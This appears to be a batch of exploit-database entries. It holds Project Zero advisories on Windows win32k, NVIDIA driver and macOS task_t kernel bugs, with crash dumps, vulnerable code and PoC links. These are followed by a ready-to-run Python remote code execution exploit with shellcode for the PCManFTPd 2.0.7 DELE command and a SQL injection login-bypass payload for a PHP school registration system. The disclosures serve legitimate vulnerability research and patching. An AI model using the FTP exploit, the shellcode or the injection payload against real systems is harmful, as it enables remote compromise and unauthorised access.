Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=864
We have encountered a number of Windows kernel crashes in the win32k!itrp_GetCVTEntryFast function (called by the handler of the RCVT TrueType instruction) while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fb000078, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 8ee70ccb, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
READ_ADDRESS: fb000078 Paged session pool
FAULTING_IP:
win32k!itrp_GetCVTEntryFast+8
8ee70ccb 8b048a mov eax,dword ptr [edx+ecx*4]
MM_INTERNAL_CODE: 0
IMAGE_NAME: win32k.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 57349934
MODULE_NAME: win32k
FAULTING_MODULE: 8ee20000 win32k
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 897b3568 -- (.trap 0xffffffff897b3568)
ErrCode = 00000000
eax=fafffcdc ebx=00000000 ecx=000000ff edx=fafffc7c esi=fafffe6e edi=00000000
eip=8ee70ccb esp=897b35dc ebp=897b3620 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
win32k!itrp_GetCVTEntryFast+0x8:
8ee70ccb 8b048a mov eax,dword ptr [edx+ecx*4] ds:0023:fb000078=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 828edd87 to 82889978
STACK_TEXT:
897b30bc 828edd87 00000003 7170889f 00000065 nt!RtlpBreakWithStatusInstruction
897b310c 828ee885 00000003 00000000 00000000 nt!KiBugCheckDebugBreak+0x1c
897b34d0 8289c94d 00000050 fb000078 00000000 nt!KeBugCheck2+0x68b
897b3550 8284efa8 00000000 fb000078 00000000 nt!MmAccessFault+0x104
897b3550 8ee70ccb 00000000 fb000078 00000000 nt!KiTrap0E+0xdc
897b35d8 8ee83782 fafffe7b 8ee7bf89 00000001 win32k!itrp_GetCVTEntryFast+0x8
897b35e0 8ee7bf89 00000001 8ee81af3 00000000 win32k!itrp_RCVT+0x63
897b35e8 8ee81af3 00000000 fafffcdc faffff10 win32k!itrp_InnerExecute+0x38
897b3620 8ee7bf89 fafffcdc 8ee7f3b1 fafffd70 win32k!itrp_CALL+0x23b
897b3628 8ee7f3b1 fafffd70 fafffd38 faffff90 win32k!itrp_InnerExecute+0x38
897b36a8 8ee7cee8 fafffec8 faffff10 fafffcdc win32k!itrp_Execute+0x2b2
897b36dc 8ee85d0d fafffcdc 00000000 fa44a298 win32k!itrp_ExecutePrePgm+0x5d
897b36f8 8ee7f67c fa44a51c fafffc7c fa44a2c4 win32k!fsg_RunPreProgram+0x78
897b3758 8ee89385 00000001 897b3774 8ee892dc win32k!fs__Contour+0x1c1
897b3764 8ee892dc fa44a010 fa44a07c 897b3790 win32k!fs_ContourGridFit+0x12
897b3774 8ee89c38 fa44a010 fa44a07c 00000003 win32k!fs_NewContourGridFit+0x10
897b3790 8ee89c79 fc11ae78 00000003 897b37cc win32k!bGetGlyphOutline+0xd7
897b37b8 8ee89e72 fc11ae78 00000003 00000001 win32k!bGetGlyphMetrics+0x20
897b38fc 8ee7ef89 fc11ae78 00000003 897b39ec win32k!lGetGlyphBitmap+0x2b
897b3924 8ee7edd6 00000000 00000001 00000003 win32k!ttfdQueryFontData+0x15e
897b3974 8ee7dff2 fc396010 fc1d0cf0 00000001 win32k!ttfdSemQueryFontData+0x45
897b39bc 8ee7e169 fc396010 fc1d0cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
897b3a30 8ee7bc81 00000002 897b3bdc 00000000 win32k!RFONTOBJ::bInitCache+0xd4
897b3aec 8eef8655 897b3bc8 897b3b94 00000003 win32k!RFONTOBJ::bRealizeFont+0x5df
897b3b98 8eef8890 fc74ad80 00000000 00000002 win32k!RFONTOBJ::bInit+0x2f4
897b3bb0 8ee8f111 897b3bc8 00000000 00000002 win32k!RFONTOBJ::vInit+0x16
897b3bd4 8ee8f262 fc1d0cf0 897b3bf4 0678b8bd win32k!GreGetRealizationInfo+0x2a
897b3c24 8284bdc6 37010587 0459f2cc 0459f2e4 win32k!NtGdiGetRealizationInfo+0x41
897b3c24 77346bf4 37010587 0459f2cc 0459f2e4 nt!KiSystemServicePostCall
0459f2e4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The bugcheck is caused by an attempt to access an out-of-bounds CVT table index (255 in this case, see the ECX register), likely due to a weird behavior of the win32k!itrp_RCVT function, which allows the index to be larger than the size of the array as long as it is smaller than 256. The bug appears to only enable an out-of-bounds read primitive, since at a first glance, the corresponding WCVT instruction handler does not seem to be affected by the same problem. Still, even in its current form, the vulnerability could be used to disclose the contents of adjacent pool allocations to user-mode, potentially leaking sensitive kernel memory or facilitating a KASLR bypass.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys, but it is also possible to observe a crash on a default Windows installation. Just hovering over the proof of concept files or opening them in the default Windows Font Viewer tool should be sufficient to trigger the condition.
Attached is an archive with two proof of concept font files.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40598.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=944
The DxgkDdiEscape handler for 0x70000d5 lacks bounds checks:
...
if ( g_saved_size )
{
escape->size = g_saved_size;
if ( (unsigned int)g_saved_size > 0 )
{
do
{
v5 = v2++;
escape->data[v5] = global_array[v5 + 77];
}
while ( v2 < g_saved_size );
}
return;
}
data = 0i64;
...
if ( escape->size > 0 )
{
do
{
ii = i++;
global_array[ii + 77] = escape->data[ii];
}
while ( i < escape->size );
...
g_saved_size = escape->size;
This handler copies data to/from a global array, but lacks any form of bounds checking, as
|escape->size| is controlled by the user. This leads to overflow of the global buffer, and pool overflows
when it's copied back into the escape data.
A PoC is attached that should cause a crash (Win 10 x64, 372.54):
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000002, Stack cookie instrumentation code detected a stack-based
buffer overrun.
Arg2: ffffd00022de52c0, Address of the trap frame for the exception that caused the bugcheck
Arg3: ffffd00022de5218, Address of the exception record for the exception that caused the bugcheck
Arg4: 0000000000000000, Reserved
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40666.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=837
TL;DR
you cannot hold or use a task struct pointer and expect the euid of that task to stay the same.
Many many places in the kernel do this and there are a great many very exploitable bugs as a result.
********
task_t is just a typedef for a task struct *. It's the abstraction level which represents a whole task
comprised of threads and a virtual memory map.
task_t's have a corrisponding mach port type (IKOT_TASK) known as a task port. The task port structure
in the kernel has a pointer to the task struct which it represents. If you have send rights to a task port then
you have control over its VM and, via task_threads, its threads.
When a suid-root binary is executed the kernel invalidates the old task and thread port structures setting their
object pointers to NULL and allocating new ports instead.
CVE-2016-1757 was a race condition concerning the order in which those port structures were invalidated during the
exec operation.
Although the issues I will describe in this bug report may seem similar is is a completely different, and far worse,
bug class.
~~~~~~~~~
When a suid binary is executed it's true that the task's old task and thread ports get invalidated, however, the task
struct itself stays the same. There's no fork and no creation of a new task. This means that any pointers to that task struct
now point to the task struct of an euid 0 process.
There are lots of IOKit drivers which save task struct pointers as members; see my recent bug reports for some examples.
In those cases I reported there was another bug, namely that they weren't taking a reference on the task struct meaning
that if we killed the corrisponding task and then forked and exec'ed a suid root binary we could get the IOKit object
to interact via the task struct pointer with the VM of a euid 0 process. (You could also break out of a sandbox by
forcing launchd to spawn a new service binary which would reuse the free'd task struct.)
However, looking more closely, even if those IOKit drivers *do* take a reference on the task struct it doesn't matter!
(at least not when there are suid binaries around.) Just because the userspace client of the user client had send rights
to a task port at time A when it passed that task port to IOKit doesn't mean that it still has send rights to it when
the IOKit driver actually uses the task struct pointer... In the case of IOSurface this lets us trivially map any RW area
of virtual memory in an euid 0 process into ours and write to it. (See the other exploit I sent for that IOSurface bug.)
There are a large number of IOKit drivers which do this (storing task struct pointers) and then either use the to manipulate
userspace VM (eg IOAcceleratorFamily2, IOThunderboltFamily, IOSurface) or rely on that task struct pointer to perform
authorization checks like the code in IOHIDFamily.
Another interesting case to consider are task struct pointers on the stack.
in the MIG files for the user/kernel interface task ports are subject to the following intran:
type task_t = mach_port_t
#if KERNEL_SERVER
intran: task_t convert_port_to_task(mach_port_t)
where convert_port_to_task is:
task_t
convert_port_to_task(
ipc_port_t port)
{
task_t task = TASK_NULL;
if (IP_VALID(port)) {
ip_lock(port);
if ( ip_active(port) &&
ip_kotype(port) == IKOT_TASK ) {
task = (task_t)port->ip_kobject;
assert(task != TASK_NULL);
task_reference_internal(task);
}
ip_unlock(port);
}
return (task);
}
This converts the task port into the corrisponding task struct pointer. It takes a reference on the task struct but that only
makes sure that it doesn't get free'd, not that its euid doesn't change as the result of the exec of an suid root binary.
As soon as that port lock is dropped the task could exec a suid-root binary and although this task port would no longer be valid
that task struct pointer would remain valid.
This leads to a huge number of interesting race conditions. Grep the source for all .defs files which take a task_t to find them all ;-)
In this exploit PoC I'll target perhaps the most interesting one: task_threads.
Let's look at how task_threads actually works, including the kernel code which is generated by MiG:
In task_server.c (an autogenerated file, build XNU first if you can't find this file) :
target_task = convert_port_to_task(In0P->Head.msgh_request_port);
RetCode = task_threads(target_task, (thread_act_array_t *)&(OutP->act_list.address), &OutP->act_listCnt);
task_deallocate(target_task);
This gives us back the task struct from the task port then calls task_threads:
(unimportant bits removed)
task_threads(
task_t task,
thread_act_array_t *threads_out,
mach_msg_type_number_t *count)
{
...
for (thread = (thread_t)queue_first(&task->threads); i < actual;
++i, thread = (thread_t)queue_next(&thread->task_threads)) {
thread_reference_internal(thread);
thread_list[j++] = thread;
}
...
for (i = 0; i < actual; ++i)
((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]);
}
...
}
task_threads uses the task struct pointer to iterate through the list of threads, then creates send rights to them
which get sent back to user space. There are a few locks taken and dropped in here but they're irrelevant.
What happens if that task is exec-ing a suid root binary at the same time?
The relevant parts of the exec code are these two points in ipc_task_reset and ipc_thread_reset:
void
ipc_task_reset(
task_t task)
{
ipc_port_t old_kport, new_kport;
ipc_port_t old_sself;
ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
int i;
new_kport = ipc_port_alloc_kernel();
if (new_kport == IP_NULL)
panic("ipc_task_reset");
itk_lock(task);
old_kport = task->itk_self;
if (old_kport == IP_NULL) {
itk_unlock(task);
ipc_port_dealloc_kernel(new_kport);
return;
}
task->itk_self = new_kport;
old_sself = task->itk_sself;
task->itk_sself = ipc_port_make_send(new_kport);
ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); <-- point (1)
... then calls:
ipc_thread_reset(
thread_t thread)
{
ipc_port_t old_kport, new_kport;
ipc_port_t old_sself;
ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
boolean_t has_old_exc_actions = FALSE;
int i;
new_kport = ipc_port_alloc_kernel();
if (new_kport == IP_NULL)
panic("ipc_task_reset");
thread_mtx_lock(thread);
old_kport = thread->ith_self;
if (old_kport == IP_NULL) {
thread_mtx_unlock(thread);
ipc_port_dealloc_kernel(new_kport);
return;
}
thread->ith_self = new_kport; <-- point (2)
Point (1) clears out the task struct pointer from the old task port and allocates a new port for the task.
Point (2) does the same for the thread port.
Let's call the process which is doing the exec process B and the process doing task_threads() process A and imagine
the following interleaving of execution:
Process A: target_task = convert_port_to_task(In0P->Head.msgh_request_port); // gets pointer to process B's task struct
Process B: ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); // process B invalidates the old task port so that it no longer has a task struct pointer
Process B: thread->ith_self = new_kport // process B allocates new thread ports and sets them up
Process A: ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); // process A reads and converts the *new* thread port objects!
Note that the fundamental issue here isn't this particular race condition but the fact that a task struct pointer can just
never ever be relied on to have the same euid as when you first got hold of it.
~~~~~~~~~~~~~~~
Exploit:
This PoC exploits exactly this race condition to get a thread port for an euid 0 process. Since we've execd it I just stick a
ret-slide followed by a small ROP payload on the actual stack at exec time then use the thread port to set RIP to a gadget
which does a large add rsp, X and pop's a shell :)
just run it for a while, it's quite a tight race window but it will work! (try a few in parallel)
tested on OS X 10.11.5 (15F34) on MacBookAir5,2
######################################
A faster exploit which also defeats the mitigations shipped in MacOS 10.12. Should work for all kernel versions <= 10.12
######################################
Fixed: https://support.apple.com/en-us/HT207275
Disclosure timeline:
2016-06-02 - Ian Beer reports "task_t considered harmful issue" to Apple
2016-06-30 - Apple requests 60 day disclosure extension.
2016-07-12 - Project Zero declines disclosure extension request.
2016-07-19 - Meeting with Apple to discuss disclosure timeline.
2016-07-21 - Followup meeting with Apple to discuss disclosure timeline.
2016-08-10 - Meeting with Apple to discuss proposed fix and disclosure timeline.
2016-08-15 - Project Zero confirms publication date will be September 21, Apple acknowledges.
2016-08-29 - Meeting with Apple to discuss technical details of (1) "short-term mitigation" that will be shipped within disclosure deadline, and (2) "long-term fix" that will be shipped after the disclosure deadline.
2016-09-13 - Apple release the "short-term mitigation" for iOS 10
2016-09-13 - Apple requests a restriction on disclosed technical details to only those parts of the issue covered by the short-term mitigation.
2016-09-14 - Project Zero confirms that it will disclose full details without restriction.
2016-09-16 - Apple repeats request to withhold details from the disclosure, Project Zero confirms it will disclose full details.
2016-09-17 - Apple requests that Project Zero delay disclosure until a security update in October.
2016-09-18 - Apple's senior leadership contacts Google's senior leadership to request that Project Zero delay disclosure of the task_t issue
2016-09-19 - Google grants a 5 week flexible disclosure extension.
2016-09-20 - Apple release a "short-term mitigation" for the task_t issue for MacOS 10.12
2016-09-21 - Planned publication date passes.
2016-10-03 - Apple publicly release long-term fix for the task_t issue in MacOS beta release version 10.12.1 beta 3.
2016-10-24 - Apple release MacOS version 10.12.1
2016-10-25 - Disclosure date of "task_t considered harmful"
Project Zero remains committed to a 90-day disclosure window, and will continue to apply disclosure deadlines on all of our vulnerability research findings. A 14 day grace extension is available for cases where a patch is expected shortly after the 90-day time window.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40669.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=946
There is a missing bounds check in inner loop of the escape handler for 0x7000014
that leads to a stack buffer overflow:
...
for (DWORD i = 0; < escape->num_data; ++i) {
...
// size is user controlled.
size = escape->data[i].size;
for (DWORD j = 0; j < size; ++j) {
stack_buf[j] = escape->data[...];
}
}
The attached PoC gives me the following crashing context (Win 10 x64, 372.54):
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer. This overrun could potentially
allow a malicious user to gain control of this machine.
...
ffffd000`23f94a78 fffff801`6e5deaf2 : ffffd000`23f95270 00000000`000000f7 ffffd000`23f94be0 fffff801`6e43c848 : nt!DbgBreakPointWithStatus
ffffd000`23f94a80 fffff801`6e5de4c3 : 00000000`00000003 ffffd000`23f94be0 fffff801`6e56c600 00000000`000000f7 : nt!KiBugCheckDebugBreak+0x12
ffffd000`23f94ae0 fffff801`6e55fa44 : 00000000`00000000 00000000`00000000 ffffc001`c8e7202c fffff801`6e7188b8 : nt!KeBugCheck2+0x893
ffffd000`23f951f0 fffff800`c58e2bc6 : 00000000`000000f7 ffffd000`23f95270 000044dd`b2c37fec ffffbb22`4d3c8013 : nt!KeBugCheckEx+0x104
ffffd000`23f95230 fffff800`c57ba4ce : ffffd000`23f95220 ffffe000`69a62000 00000000`00000001 00000000`07000014 : nvlddmkm+0x192bc6
ffffd000`23f95270 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvlddmkm+0x6a4ce
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40667.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=947
The escape handler for 0x10000e9 lacks bounds checks, and passes a user
specified size as the size to memcpy, resulting in a stack buffer overflow:
bool escape_10000e9(NvMiniportDeviceContext *a1, Escape10000e9 *escape) {
...
LOBYTE(a9) = escape_->unknown_5[1] != 0;
LOBYTE(a8) = escape_->unknown_5[0] != 0;
if ( !sub_DC57C(
*(_QWORD *)(*(_QWORD *)(v4 + 104) + 1000i64),
escape_->unknown_1,
escape_->unknown_2,
escape_->unknown_3,
escape_->unknown_4,
escape_->data,
escape_->size,
a8,
a9,
&escape_->unknown_5[2]) )
return 0;
escape_->header.result = 1;
return 1;
}
char sub_DC57C(...) {
...
// escape_buf is escape_->data from previous function
// buf_size is escape->size
memcpy(&stack_buf, escape_buf, (unsigned int)buf_size);
...
Crashing context (Win 10 x64, 372.54):
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer. This overrun could potentially
allow a malicious user to gain control of this machine.
...
STACK_TEXT:
ffffd000`263bc188 fffff803`9d1deaf2 : 9d919d43`2d3cc8a7 00000000`000000f7 ffffd000`263bc2f0 fffff803`9d03c848 : nt!DbgBreakPointWithStatus
ffffd000`263bc190 fffff803`9d1de4c3 : 00000000`00000003 ffffd000`263bc2f0 fffff803`9d16c600 00000000`000000f7 : nt!KiBugCheckDebugBreak+0x12
ffffd000`263bc1f0 fffff803`9d15fa44 : 00000000`00000000 00000000`00000000 00000000`00000000 ffffc000`494d4764 : nt!KeBugCheck2+0x893
ffffd000`263bc900 fffff800`ad8c2bc6 : 00000000`000000f7 9d919d43`2d3cc8a7 0000f6ec`74dc94fc ffff0913`8b236b03 : nt!KeBugCheckEx+0x104
ffffd000`263bc940 fffff800`ad7fc6f7 : c0004492`55400400 ffff8000`00000000 ffffc000`44925540 00000000`00000000 : nvlddmkm+0x192bc6
ffffd000`263bc980 ffffc000`585e78a0 : 00000000`000005d4 00430043`00310030 4666744e`03610107 00000000`00000000 : nvlddmkm+0xcc6f7
ffffd000`263bce70 00000000`000005d4 : 00430043`00310030 4666744e`03610107 00000000`00000000 00000c48`01380702 : 0xffffc000`585e78a0
ffffd000`263bce78 00430043`00310030 : 4666744e`03610107 00000000`00000000 00000c48`01380702 00010000`000166c2 : 0x5d4
ffffd000`263bce80 4666744e`03610107 : 00000000`00000000 00000c48`01380702 00010000`000166c2 00000000`00000000 : 0x00430043`00310030
ffffd000`263bce88 00000000`00000000 : 00000c48`01380702 00010000`000166c2 00000000`00000000 00000000`00000000 : 0x4666744e`03610107
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40668.zip
from ftplib import FTP
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: PCmanftpd_delete_command_remotecode_exploit_Win7_x64_HUN_ENG
# Date: 2016.10.31
# Exploit Author: Greg Priest
# Version: Pcmanftpd 2.0.7
# Tested on: Windows 7 Enterprise x64 HUN/ENG
'''
ftp_ip = raw_input("FTP server IP:")
overflow = 'A' * 2005
eip = '\xCA\x96\xC9\x76' + '\x90' * 10
shellcode=(
"\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
remotecode = overflow + eip + shellcode
ftp = FTP(ftp_ip)
ftp.login('anonymous', 'hacker@hacker.net')
print ftp.login
print '''
Successfull Exploitation!
'''
FTP.delete(ftp, remotecode)
# Exploit Title.............. School Registration and Fee System Auth Bypass
# Google Dork................ N/A
# Date....................... 01/11/2016
# Exploit Author............. opt1lc
# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip
# Version.................... N/A
# Tested on.................. XAMPP
# CVE........................ N/A
# File....................... bilal_final/login.php
---------------------------------------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
/* student */
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
----snip----
---------------------------------------------------
Exploit
-------
You can login with username and password : administrator' or '1'='1
Patching
-------
You can use one of function in PHP : mysql_real_escape_string() to
---------------------------------------------------
----snip----
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
/* student */
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
----snip----
---------------------------------------------------
Credit
-------
This vulnerability was discovered and researched by opt1lc
Shout
-------
My Beautiful Daughter & My Wife
Reference
-------
http://php.net/manual/en/function.mysql-real-escape-string.php